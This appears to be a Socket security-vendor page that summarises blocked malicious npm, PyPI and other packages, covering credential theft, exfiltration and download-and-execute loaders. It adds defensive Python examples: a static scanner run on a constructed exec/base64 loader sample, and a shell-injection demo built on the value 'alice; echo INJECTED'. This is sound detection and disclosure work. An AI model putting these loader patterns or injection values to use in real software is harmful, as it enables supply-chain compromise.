
Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0
left-pad: stevemao published 1.3.0
react: react-bot published 19.2.4

We protect you from vulnerable and malicious packages

voxelbotutils 0.8.3, live on pypi. Blocked by Socket.

The cog exhibits multiple high-risk execution pathways that enable arbitrary code execution, remote control, and dynamic code loading from external sources. The Redis RunRedisEval channel is a primary backdoor-like vector that can bypass owner checks if Redis is compromised. Combined with ev/eval, downloadfile, and shell, this code represents a severe supply-chain/runtime risk and should be removed or heavily sandboxed, with strict access controls and input validation. The syntax issue in export_guild further suggests maintenance fragility and potential exploitation paths. Overall, the package demonstrates malware-like behavior and warrants high security restrictions or complete replacement in any open-source distribution.

354766/openclaw/skills/productivity-helper/ (cfc58490ae1ab5b6d90b5917f509cf3f8f233f37), live on socket. Blocked by Socket.

[Skill Scanner] URL pointing to executable file detected. All findings:
[CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4]
[CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4]
[HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4]
[HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4]
[HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4]
[HIGH] command_injection: Multi-step download-and-execute pattern detected (CI007) [AITech 9.1.4]
[HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4]

This skill is malicious. It contains explicit credential harvesting, local secret-file reads (SSH private key and AWS credentials), multiple untrusted download-and-execute instructions, dynamic execution (eval), and exfiltration of sensitive data to several suspicious third-party domains using unencrypted channels. The requested capabilities are grossly disproportionate to the stated productivity purpose and match well-known supply-chain and credential-harvesting attack patterns. Do not run or install this skill; treat it as compromised/malicious.

LLM verification: This skill is malicious. It contains explicit instructions and code to harvest credentials, read and exfiltrate private keys and cloud credentials, download and execute remote binaries, and send system information to attacker-controlled endpoints over unencrypted channels. It is not coherent with the stated productivity purpose and should be treated as a high-risk supply-chain malware artifact. Do not run or install; remove and block the listed domains and artifacts.

imagecomponents.webcore.ui 4.0.4 by Image Components, live on nuget. Blocked by Socket.

High risk: The code exhibits intentionally obfuscated, loader-like characteristics with capabilities for in-process dynamic code loading, native memory manipulation, and cross-platform (Linux/Windows) interop. While some elements could be legitimate security tooling, the prevailing patterns strongly align with malware-like behavior and supply-chain abuse risks. Recommend excluding or replacing with a transparent, auditable implementation, conducting a full dependency and payload verification, and enforcing strict build-time and run-time checks to prevent hidden code execution in downstream deployments.

steedos-server 2.6.4-beta.14 by steedos-baozhoutao, live on npm. Blocked by Socket.

There is a high-risk credential leakage pattern: client-side code reads authentication-related cookies and transmits them to an external domain via a URL query string during a redirect. This creates a credible risk of token exposure and session hijacking. Remediation should avoid sending tokens in URLs; adopt server-side token exchange, short-lived tokens, or authorization headers with strict origin controls, and remove or minimize sensitive data in client-side redirects. The presence of this pattern warrants a thorough security review of cross-domain integrations and potential refactoring to eliminate credential leakage paths.

sbcli-mig 1.0.424, live on pypi. Blocked by Socket.

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True and always use argument lists; avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC); eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed; validate/escape inputs (especially file paths); fix the returncod typo; and audit all invoked shell scripts before use. Treat the package as risky until mitigations and script audits are performed.

chameleon-system/chameleon-shop dev-65287-add-Ecommerce-stats-bundle-to-core, live on composer. Blocked by Socket.

The script is a deliberate manipulation of PHP loading mechanics (autoloader removal and require_once stripping). While it could be used legitimately in constrained deployment scenarios, its combination constitutes a significant supply-chain risk by enabling non-standard loading paths, potentially concealing malicious components or bypassing integrity checks. Any deployment of this script should be rejected or accompanied by rigorous integrity validation, code review, and rollback plans.

github.com/cli/cli/v2 v2.0.1-0.20211005122053-50d8f1e09ab6, live on go. Blocked by Socket.

The primary security concern is the hardcoded OAuth client secret, which poses a risk of unauthorized access. The code otherwise follows a standard OAuth flow without any indication of malicious behavior.

mailchat-kit 1.2.4 by clout-team, removed from npm. Blocked by Socket.

This code contains explicit credential handling that extracts a 'token' from document.cookie and sends it to external endpoints (api.clout.one) both as a POST FormData field and as a query parameter on a WebSocket connection. It also uploads user-selected files (or pasted/dragged files) to files.clout.one. Those data-flows represent credential forwarding and potential data exfiltration. If api.clout.one/files.clout.one are not intentionally trusted backends for the host application, this module presents a serious supply-chain/privacy risk and should be treated as malicious or at least highly suspicious. If they are legitimate endpoints the behavior is still privacy-sensitive and should be audited (why token is pulled from cookie rather than using standard auth headers, why rejectUnauthorized is false, etc.).

Live on npm for 4 hours and 20 minutes before removal. Socket users were protected even while the package was live.

@mavogel/cdk-vscode-server 0.0.56 by mavogel, live on npm. Blocked by Socket.

The fragment demonstrates a high-risk pattern: legitimate-looking infrastructure automation interwoven with heavy obfuscation, remote payload fetches, and multiple persistent access surfaces (code-server, nginx). While some parts could be legitimate bootstrap logic, the combination of opaque payloads, diverse external downloads, and potential credential exposure warrants thorough provenance verification, strict control over dynamic code execution, and limited exposure of admin services in production. Treat as high risk until all remote content is verified and authenticated.

@neoxr/wb 6.0.0-rc.28 by neoxr, live on npm. Blocked by Socket.

This module is intentionally obfuscated and constructs code at runtime using an assembled string passed to Function(...). It also embeds names referencing filesystem and local modules and contains many awaited calls and identifiers that appear to be network wrappers. Those are high-risk signs: dynamic code execution + hidden payload + potential filesystem and network activity. Treat the package as malicious or at best extremely suspicious. If this appeared as a dependency in a project, do not run it in production — remove it, perform full deobfuscation in a safe sandbox, and investigate network/file changes. Immediate remediation: isolate any environment that ran this code, rotate secrets, and audit installs for related packages.

xbp 10.15.2, live on cargo. Blocked by Socket.

The download_and_run_binary path enables untrusted remote code execution by downloading and immediately executing binaries without validation or sandboxing. This poses a high risk for supply-chain attacks and host compromise. To reduce risk, constrain or remove this capability, or enforce strict authentication, authorization, integrity verification (hash/signature), content-type checks, sandboxing, and isolation (e.g., run in a restricted container) before any execution. Consider removing /tmp-based persistence for downloaded payloads and using signed, auditable workflows.

stableagents-ai 0.2.2, live on pypi. Blocked by Socket.

This module exposes multiple high-risk capabilities: arbitrary shell execution (subprocess.run with shell=True), process spawning from untrusted input, and unrestricted filesystem modification (create, move, copy, delete) based on user-provided parameters. There are no input validations, privilege checks or limits. I assess this as not clearly malicious by intent (it implements utility functions), but it is easily abusable and dangerous in contexts where inputs are untrusted. Treat this code as a high security risk if incorporated into environments that handle external input or run with elevated privileges.

onairos 4.3.2, live on npm. Blocked by Socket.

The code implements explicit client-side exfiltration of ChatGPT conversations and stored Onairos credentials to a third-party endpoint (https://api2.onairos.uk/chatgpt-sync) via a hidden-form POST in a popup created by a bookmarklet. This is high privacy risk: it transmits potentially sensitive conversation history and a locally-stored JWT to an external service. If the user trusts Onairos and explicitly consents, the behavior may be intended; otherwise treat this as malicious/unsafe. Immediate recommendations: remove hard-coded secrets from source, require clear explicit consent before reading session data or local tokens, and avoid bundling eval-enabled libraries with code that accesses sensitive session credentials. Audit the remote endpoint and operator before using.

robloxextra 0.1, live on pypi. Blocked by Socket.

This fragment implements immediate remote code execution by fetching text from a hardcoded external URL and passing it directly to exec(), creating a high-likelihood supply-chain/backdoor vector. Treat this code as malicious or extremely dangerous: do not import or run it in production. Replace with safe alternatives (no exec on remote content, use signed updates, sandboxing, or fetch only data). If encountered in a dependency, remove or quarantine the package and perform incident response to determine exposure.

@zohodesk/react-cli 0.0.1-beta.80 by vasikaran, live on npm. Blocked by Socket.

This code fragment performs immediate, automatic exfiltration of local repository commit hash and package metadata to a hardcoded external server over plaintext HTTP, triggered on module import. The combination of synchronous shell execution at load time, hardcoded external address, mild URL obfuscation, lack of opt-out/configuration, and throwing on missing changeset are strong indicators of malicious or unauthorized telemetry/backdoor behavior for an open-source dependency. Treat this as high-risk: remove or block the package until its provenance and intent are verified, and investigate any systems that have imported/installed it.

@tiledesk/tiledesk-multi-worker 0.1.20 by eljohnny, live on npm. Blocked by Socket.

The QueueManager contains a high-risk remote code execution sink via dynamic Function execution of untrusted message payloads. This represents a severe supply-chain/runtime security hazard. Additionally, there is a likely bug in listener dispatch and a lack of input validation or sandboxing. Immediate mitigations include removing dynamic code execution, validating message schemas, implementing a strict allowlist of executed code paths, sandboxing or abandoning Function-based evaluation, and correcting listener logic. The upgrade plan should replace dynamic execution with predefined, safe handlers and add robust error handling and authentication checks.

bluelamp-ai 1.0.1, removed from pypi. Blocked by Socket.

This file is a loader that deliberately hides its payload using base64 + zlib compression and runs it immediately with exec(). That is an anti-analysis pattern and presents a high risk: the executed code could perform arbitrary and potentially malicious actions with the importing process privileges. Treat this module as untrusted until the embedded payload is decompressed and reviewed in a safe, sandboxed environment. Do not run in production or on systems holding sensitive data without prior inspection and verification.

Live on pypi for 4 days, 1 hour and 19 minutes before removal. Socket users were protected even while the package was live.

kaia-brainbox 0.0.4, removed from pypi. Blocked by Socket.

This code contains high-risk operations: unvalidated filesystem unpickling (pickle.load) and file upload into a path derived from URL components. If an attacker can control the file contents referenced by the self-test path or can exploit the upload path to place files, they can achieve remote code execution or arbitrary file write/read. Recommended actions: avoid pickle for untrusted data (use safe serialization), validate and canonicalize 'decider_name' and 'path' (reject path traversal and unexpected characters), enforce authentication/authorization on these endpoints, restrict upload locations and validate file types/sizes, and stop returning full tracebacks to clients. No obvious obfuscation or explicit hardcoded credentials found.

Live on pypi for 7 hours and 12 minutes before removal. Socket users were protected even while the package was live.

github.com/bishopfox/sliver v1.4.9-0.20210406091252-1a5335ab9e57, live on go. Blocked by Socket.

This file implements Windows RPC handlers for a remote implant/agent (Sliver) that perform high-risk offensive operations: arbitrary remote command execution, privilege manipulation (impersonation/tokens), process migration and DLL injection, service and registry manipulation, and starting pivot/listener channels. These behaviors are characteristic of a post-exploitation implant and pose a severe supply-chain and operational security risk if included as a dependency. Unless used in an intentional controlled offensive security environment, this package should be considered malicious/risky and avoided.

custodes 0.0.12, live on pypi. Blocked by Socket.

The module implements a high-risk pattern: it auto-downloads a helper executable from an external host (base64-encoded URL), stores it under /tmp, makes it executable, and runs it with a JSON file containing local IP/geolocation and service status. Because the downloaded binary is not validated or sandboxed, this is effectively remote code execution controlled by the remote host and represents a serious supply-chain/backdoor risk. Treat as dangerous until the downloaded artifact and domain provenance are verified.

@usaa-grp-inf-presentation/usaa-tw-base 1.0.1 by rexnet, live on npm. Blocked by Socket.

The code is engaging in potentially malicious behavior by collecting and sending sensitive system information to an external server without user consent.

mtmai 0.3.1006, live on pypi. Blocked by Socket.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

voxelbotutils

0.8.3

Live on pypi

Blocked by Socket

The cog exhibits multiple high-risk execution pathways that enable arbitrary code execution, remote control, and dynamic code loading from external sources. The Redis RunRedisEval channel is a primary backdoor-like vector that can bypass owner checks if Redis is compromised. Combined with ev/eval, downloadfile, and shell, this code represents a severe supply-chain/runtime risk and should be removed or heavily sandboxed, with strict access controls and input validation. The syntax issue in export_guild further suggests maintenance fragility and potential exploitation paths. Overall, the package demonstrates malware-like behavior and warrants high security restrictions or complete replacement in any open-source distribution.

354766/openclaw/skills/productivity-helper/

cfc58490ae1ab5b6d90b5917f509cf3f8f233f37

Live on socket

Blocked by Socket

[Skill Scanner] URL pointing to executable file detected All findings: [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] command_injection: Multi-step download-and-execute pattern detected (CI007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] This skill is malicious. It contains explicit credential harvesting, local secret-file reads (SSH private key and AWS credentials), multiple untrusted download-and-execute instructions, dynamic execution (eval), and exfiltration of sensitive data to several suspicious third-party domains using unencrypted channels. The requested capabilities are grossly disproportionate to the stated productivity purpose and match well-known supply-chain and credential-harvesting attack patterns. Do not run or install this skill; treat it as compromised/malicious. LLM verification: This skill is malicious. It contains explicit instructions and code to harvest credentials, read and exfiltrate private keys and cloud credentials, download and execute remote binaries, and send system information to attacker-controlled endpoints over unencrypted channels. It is not coherent with the stated productivity purpose and should be treated as a high-risk supply-chain malware artifact. Do not run or install; remove and block the listed domains and artifacts.

imagecomponents.webcore.ui

4.0.4

by Image Components

Live on nuget

Blocked by Socket

High risk: The code exhibits intentionally obfuscated, loader-like characteristics with capabilities for in-process dynamic code loading, native memory manipulation, and cross-platform (Linux/Windows) interop. While some elements could be legitimate security tooling, the prevailing patterns strongly align with malware-like behavior and supply-chain abuse risks. Recommend excluding or replacing with a transparent, auditable implementation, conducting a full dependency and payload verification, and enforcing strict build-time and run-time checks to prevent hidden code execution in downstream deployments.

steedos-server

2.6.4-beta.14

by steedos-baozhoutao

Live on npm

Blocked by Socket

There is a high-risk credential leakage pattern: client-side code reads authentication-related cookies and transmits them to an external domain via a URL query string during a redirect. This creates a credible risk of token exposure and session hijacking. Remediation should avoid sending tokens in URLs; adopt server-side token exchange, short-lived tokens, or authorization headers with strict origin controls, and remove or minimize sensitive data in client-side redirects. The presence of this pattern warrants a thorough security review of cross-domain integrations and potential refactoring to eliminate credential leakage paths.

sbcli-mig

1.0.424

Live on pypi

Blocked by Socket

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

chameleon-system/chameleon-shop

dev-65287-add-Ecommerce-stats-bundle-to-core

Live on composer

Blocked by Socket

The script is a deliberate manipulation of PHP loading mechanics (autoloader removal and require_once stripping). While it could be used legitimately in constrained deployment scenarios, its combination constitutes a significant supply-chain risk by enabling non-standard loading paths, potentially concealing malicious components or bypassing integrity checks. Any deployment of this script should be rejected or accompanied by rigorous integrity validation, code review, and rollback plans.

github.com/cli/cli/v2

v2.0.1-0.20211005122053-50d8f1e09ab6

Live on go

Blocked by Socket

The primary security concern is the hardcoded OAuth client secret, which poses a risk of unauthorized access. The code otherwise follows a standard OAuth flow without any indication of malicious behavior.

mailchat-kit

1.2.4

by clout-team

Removed from npm

Blocked by Socket

This code contains explicit credential handling that extracts a 'token' from document.cookie and sends it to external endpoints (api.clout.one) both as a POST FormData field and as a query parameter on a WebSocket connection. It also uploads user-selected files (or pasted/dragged files) to files.clout.one. Those data-flows represent credential forwarding and potential data exfiltration. If api.clout.one/files.clout.one are not intentionally trusted backends for the host application, this module presents a serious supply-chain/privacy risk and should be treated as malicious or at least highly suspicious. If they are legitimate endpoints the behavior is still privacy-sensitive and should be audited (why token is pulled from cookie rather than using standard auth headers, why rejectUnauthorized is false, etc.).

Live on npm for 4 hours and 20 minutes before removal. Socket users were protected even while the package was live.

@mavogel/cdk-vscode-server

0.0.56

by mavogel

Live on npm

Blocked by Socket

The fragment demonstrates a high-risk pattern: legitimate-looking infrastructure automation interwoven with heavy obfuscation, remote payload fetches, and multiple persistent access surfaces (code-server, nginx). While some parts could be legitimate bootstrap logic, the combination of opaque payloads, diverse external downloads, and potential credential exposure warrants thorough provenance verification, strict control over dynamic code execution, and limited exposure of admin services in production. Treat as high risk until all remote content is verified and authenticated.

@neoxr/wb

6.0.0-rc.28

by neoxr

Live on npm

Blocked by Socket

This module is intentionally obfuscated and constructs code at runtime using an assembled string passed to Function(...). It also embeds names referencing filesystem and local modules and contains many awaited calls and identifiers that appear to be network wrappers. Those are high-risk signs: dynamic code execution + hidden payload + potential filesystem and network activity. Treat the package as malicious or at best extremely suspicious. If this appeared as a dependency in a project, do not run it in production — remove it, perform full deobfuscation in a safe sandbox, and investigate network/file changes. Immediate remediation: isolate any environment that ran this code, rotate secrets, and audit installs for related packages.

xbp

10.15.2

Live on cargo

Blocked by Socket

The download_and_run_binary path enables untrusted remote code execution by downloading and immediately executing binaries without validation or sandboxing. This poses a high risk for supply-chain attacks and host compromise. To reduce risk, constrain or remove this capability, or enforce strict authentication, authorization, integrity verification (hash/signature), content-type checks, sandboxing, and isolation (e.g., run in a restricted container) before any execution. Consider removing /tmp-based persistence for downloaded payloads and using signed, auditable workflows.

stableagents-ai

0.2.2

Live on pypi

Blocked by Socket

This module exposes multiple high-risk capabilities: arbitrary shell execution (subprocess.run with shell=True), process spawning from untrusted input, and unrestricted filesystem modification (create, move, copy, delete) based on user-provided parameters. There are no input validations, privilege checks or limits. I assess this as not clearly malicious by intent (it implements utility functions), but it is easily abuseable and dangerous in contexts where inputs are untrusted. Treat this code as high security risk if incorporated into environments that handle external input or run with elevated privileges.

onairos

4.3.2

Live on npm

Blocked by Socket

The code implements explicit client-side exfiltration of ChatGPT conversations and stored Onairos credentials to a third-party endpoint (https://api2.onairos.uk/chatgpt-sync) via a hidden-form POST in a popup created by a bookmarklet. This is high privacy risk: it transmits potentially sensitive conversation history and a locally-stored JWT to an external service. If the user trusts Onairos and explicitly consents, the behavior may be intended; otherwise treat this as malicious/unsafe. Immediate recommendations: remove hard-coded secrets from source, require clear explicit consent before reading session data or local tokens, and avoid bundling eval-enabled libraries with code that accesses sensitive session credentials. Audit the remote endpoint and operator before using.

robloxextra

0.1

Live on pypi

Blocked by Socket

This fragment implements immediate remote code execution by fetching text from a hardcoded external URL and passing it directly to exec(), creating a high-likelihood supply-chain/backdoor vector. Treat this code as malicious or extremely dangerous: do not import or run it in production. Replace with safe alternatives (no exec on remote content, use signed updates, sandboxing, or fetch only data). If encountered in a dependency, remove or quarantine the package and perform incident response to determine exposure.

@zohodesk/react-cli

0.0.1-beta.80

by vasikaran

Live on npm

Blocked by Socket

This code fragment performs immediate, automatic exfiltration of local repository commit hash and package metadata to a hardcoded external server over plaintext HTTP, triggered on module import. The combination of synchronous shell execution at load time, hardcoded external address, mild URL obfuscation, lack of opt-out/configuration, and throwing on missing changeset are strong indicators of malicious or unauthorized telemetry/backdoor behavior for an open-source dependency. Treat this as high-risk: remove or block the package until its provenance and intent are verified, and investigate any systems that have imported/installed it.

@tiledesk/tiledesk-multi-worker

0.1.20

by eljohnny

Live on npm

Blocked by Socket

The QueueManager contains a high-risk remote code execution sink via dynamic Function execution of untrusted message payloads. This represents a severe supply-chain/runtime security hazard. Additionally, there is a likely bug in listener dispatch and lack of input validation or sandboxing. Immediate mitigations include removing dynamic code execution, validating message schemas, implementing a strict allowlist of executed code paths, sandboxing or abandoning Function-based evaluation, and correcting listener logic. Upgrade plan should replace dynamic execution with predefined, safe handlers and add robust error handling and authentication checks.

bluelamp-ai

1.0.1

Removed from pypi

Blocked by Socket

This file is a loader that deliberately hides its payload using base64 + zlib compression and runs it immediately with exec(). That is an anti-analysis pattern and presents a high risk: the executed code could perform arbitrary and potentially malicious actions with the importing process privileges. Treat this module as untrusted until the embedded payload is decompressed and reviewed in a safe, sandboxed environment. Do not run in production or on systems holding sensitive data without prior inspection and verification.

Live on pypi for 4 days, 1 hour and 19 minutes before removal. Socket users were protected even while the package was live.

kaia-brainbox

0.0.4

Removed from pypi

Blocked by Socket

This code contains high-risk operations: unvalidated filesystem unpickling (pickle.load) and file upload into a path derived from URL components. If an attacker can control the file contents referenced by the self-test path or can exploit the upload path to place files, they can achieve remote code execution or arbitrary file write/read. Recommended actions: avoid pickle for untrusted data (use safe serialization), validate and canonicalize 'decider_name' and 'path' (reject path traversal and unexpected characters), enforce authentication/authorization on these endpoints, restrict upload locations and validate file types/sizes, and stop returning full tracebacks to clients. No obvious obfuscation or explicit hardcoded credentials found.

Live on pypi for 7 hours and 12 minutes before removal. Socket users were protected even while the package was live.

github.com/bishopfox/sliver

v1.4.9-0.20210406091252-1a5335ab9e57

Live on go

Blocked by Socket

This file implements Windows RPC handlers for a remote implant/agent (Sliver) that perform high-risk offensive operations: arbitrary remote command execution, privilege manipulation (impersonation/tokens), process migration and DLL injection, service and registry manipulation, and starting pivot/listener channels. These behaviors are characteristic of a post-exploitation implant and pose a severe supply-chain and operational security risk if included as a dependency. Unless used in an intentional controlled offensive security environment, this package should be considered malicious/risky and avoided.

custodes

0.0.12

Live on pypi

Blocked by Socket

The module auto-downloads a helper executable from an external host (the URL is stored base64-encoded), saves it under /tmp, marks it executable, and runs it with a JSON file containing the local IP, geolocation and service status. Because the downloaded binary is neither validated nor sandboxed, this is remote code execution controlled by the remote host and a serious supply-chain/backdoor risk. Treat it as dangerous until the downloaded artifact and the domain's provenance have been verified.
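Both the base64+zlib loader entry above and this custodes entry come down to a string literal that only becomes meaningful after decoding. The following added example (not Socket's scanner and not either package's code) shows how a reviewer can triage such a module statically: it walks the AST, reports every exec()/eval() call, folds the common decoder chain (base64, zlib, reversed literals) to recover the payload without running it, and flags string constants that are base64 of an http(s) URL. The sample loader, its payload and the host name are constructed here.

```python
"""Static triage of a suspect Python module without executing it.

Added example, not code from the flagged packages or from Socket. The sample
loader below is constructed; its payload body and the URL are hypothetical.
"""
import ast
import base64
import re
import zlib

SAMPLE_PAYLOAD = "import os\nos.system('id')  # hypothetical payload body\n"
_BLOB = base64.b64encode(zlib.compress(SAMPLE_PAYLOAD.encode())).decode()
_URL_BLOB = base64.b64encode(b"https://updates.example.invalid/helper").decode()
SAMPLE_LOADER = (
    "import base64, zlib\n"
    f"exec(zlib.decompress(base64.b64decode({_BLOB!r})))\n"
    f"URL = {_URL_BLOB!r}\n"  # encoded download URL, as in the custodes entry
)

# Decoder steps folded statically; anything else stays opaque and is reported
# as a dynamic exec() that needs a sandbox.
_ONE_ARG = {"b64decode": base64.b64decode, "b32decode": base64.b32decode,
            "decompress": zlib.decompress}
_NO_ARG = {"decode": lambda v: v.decode("utf-8", "replace"),
           "encode": lambda v: v.encode("utf-8")}


def _fold(node):
    """Return the static str/bytes value of an expression, or None if dynamic."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
        return node.value
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) and not node.keywords:
        attr = node.func.attr
        try:
            if attr in _ONE_ARG and len(node.args) == 1:      # base64.b64decode(x)
                inner = _fold(node.args[0])
                return None if inner is None else _ONE_ARG[attr](inner)
            if attr in _NO_ARG and not node.args:              # x.decode()
                inner = _fold(node.func.value)
                return None if inner is None else _NO_ARG[attr](inner)
        except Exception:  # malformed blob or wrong type: treat as dynamic
            return None
    # Reversed literal, e.g. '=s2b'[::-1], a common light obfuscation.
    if (isinstance(node, ast.Subscript) and isinstance(node.slice, ast.Slice)
            and node.slice.lower is None and node.slice.upper is None
            and isinstance(node.slice.step, ast.UnaryOp)
            and isinstance(node.slice.step.op, ast.USub)
            and isinstance(node.slice.step.operand, ast.Constant)
            and node.slice.step.operand.value == 1):
        inner = _fold(node.value)
        return None if inner is None else inner[::-1]
    return None


_B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _decoded_url(text: str):
    """If a string literal is base64 of an http(s) URL, return that URL."""
    if len(text) % 4 or not _B64_RE.match(text):
        return None
    try:
        raw = base64.b64decode(text, validate=True).decode("ascii")
    except Exception:
        return None
    return raw if raw.startswith(("http://", "https://")) else None


def scan_module(source: str) -> list[dict]:
    """Report exec()/eval() calls (payload folded statically where possible,
    else None) and base64-encoded URL literals, ordered by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and node.args:
            f = node.func
            called = f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)
            if called in ("exec", "eval"):
                payload = _fold(node.args[0])
                if isinstance(payload, bytes):
                    payload = payload.decode("utf-8", "replace")
                findings.append({"kind": called, "line": node.lineno, "payload": payload})
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = _decoded_url(node.value)
            if url:
                findings.append({"kind": "encoded_url", "line": node.lineno, "url": url})
    return sorted(findings, key=lambda x: x["line"])


if __name__ == "__main__":
    for finding in scan_module(SAMPLE_LOADER):
        print(finding)
```

A payload of None means the argument could not be folded (it came from a file, the network or arithmetic), which is exactly the case that has to go to a sandbox rather than be trusted.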

@usaa-grp-inf-presentation/usaa-tw-base

1.0.1

by rexnet

Live on npm

Blocked by Socket

The code collects sensitive system information and sends it to an external server without user consent, which is potentially malicious behavior.

mtmai

0.3.1006

Live on pypi

Blocked by Socket

This fragment installs and starts KasmVNC by running many shell commands that create certificates, write VNC password files, adjust group membership, and launch a VNC server. The main security issues are unsafe shell interpolation (command injection), persisting a possibly predictable password, running sudo on the basis of unvalidated environment variables, starting a VNC server bound to 0.0.0.0 with authentication disabled or reduced to basic auth, and several unsafe filesystem operations performed through the shell. There is no clear evidence of obfuscation or direct exfiltration, but the result can serve as an unauthorized remote-access vector (backdoor-like) if misused. Do not run this code without replacing shell strings with argument lists, validating inputs, generating passwords with a CSPRNG, enforcing restrictive file permissions, and keeping authentication enabled.
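The injection and the password-file handling described above, side by side with their hardened forms, as an added example (not the package's code). `echo` stands in for the usermod/vncpasswd invocations so the block runs anywhere; VNC_USER is a placeholder variable name; the password is generated rather than taken from configuration.

```python
"""Shell-string interpolation versus argument lists, plus a 0600 secret file.

Added example, not the flagged package's code. `echo` is a stand-in for the
real privileged commands; VNC_USER is a placeholder environment variable.
"""
import os
import re
import secrets
import stat
import subprocess
import tempfile

_USER_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def vulnerable_run(user: str) -> str:
    """Pattern from the alert: the value is interpolated into a shell string,
    so VNC_USER='alice; echo INJECTED' runs a second command."""
    cmd = f"echo adding user {user}"  # real code: sudo usermod ... {user}
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_run(user: str) -> str:
    """Argument list, no shell: the same value is one literal argument."""
    argv = ["echo", "adding user", user]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def validate_user(user: str) -> str:
    """Even with argv, usermod should only ever see a plausible username."""
    if not _USER_RE.match(user):
        raise ValueError(f"refusing unexpected VNC_USER value: {user!r}")
    return user


def hardened_run(env: dict) -> str:
    """Read the name from the environment, validate it, run without a shell."""
    return argv_run(validate_user(env.get("VNC_USER", "")))


def generate_vnc_password(nbytes: int = 24) -> str:
    """CSPRNG-backed; never a fixed or configuration-derived default."""
    return secrets.token_urlsafe(nbytes)


def write_secret_file(path: str, content: str) -> int:
    """Create the file with mode 0600 from the first instant (O_EXCL so an
    attacker-placed file is never overwritten) and return its permission bits."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo_password_file_mode() -> int:
    with tempfile.TemporaryDirectory() as d:
        return write_secret_file(os.path.join(d, "kasmpasswd"), generate_vnc_password())


if __name__ == "__main__":
    print(vulnerable_run("alice; echo INJECTED"), end="")
    print(argv_run("alice; echo INJECTED"), end="")
    print(oct(demo_password_file_mode()))
```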

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Telemetry

Unstable ownership

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub


Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Install GitHub App
Read the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Book a Demo
Read the blog

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.


RUST: crates.io (Rust Package Manager)

PHP: Packagist (PHP Package Manager)

GOLANG: Go Modules (Go Dependency Management)

JAVA: Maven Central

JAVASCRIPT: npm (Node Package Manager)

.NET: NuGet (.NET Package Manager)

PYTHON: PyPI (Python Package Index)

RUBY: RubyGems.org (Ruby Package Manager)

SWIFT: Swift

AI: Hugging Face Hub (AI Model Hub)

CI: GitHub Actions (CI/CD Workflows)

EXTENSIONS: Chrome Web Store (Chrome Browser Extensions)

EXTENSIONS: Open VSX (VS Code Extensions)

Supply chain attacks are on the rise

